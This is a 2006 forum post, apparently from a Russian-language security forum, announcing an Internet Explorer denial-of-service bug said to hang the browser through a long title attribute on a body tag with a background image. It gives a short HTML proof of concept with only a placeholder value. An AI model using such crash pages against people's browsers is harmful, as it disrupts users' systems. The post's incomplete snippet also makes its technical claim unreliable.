
12.09.2006, 21:26
|
|
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме: 1593567
Репутация:
354
|
|
Internet explorer Vulnerability:'title=""' tag - can do a serious damage
Internet explorer Vulnerability:'title=""' tag - can do a serious damage
Founded by me and my freind.
After thinking i decided to check the title bof-DoS bug on background="" tag this can cause a DoS and faster then other title="" 'tags'
Only by opening the HTML - the page will stuck
and the user will have to restart the browser .
Check the next code
PHP код:
<html>
<title>Bof-DoS</title>
<body background="image.jpg" title="Large-title">
</body>
</html>
|
|
|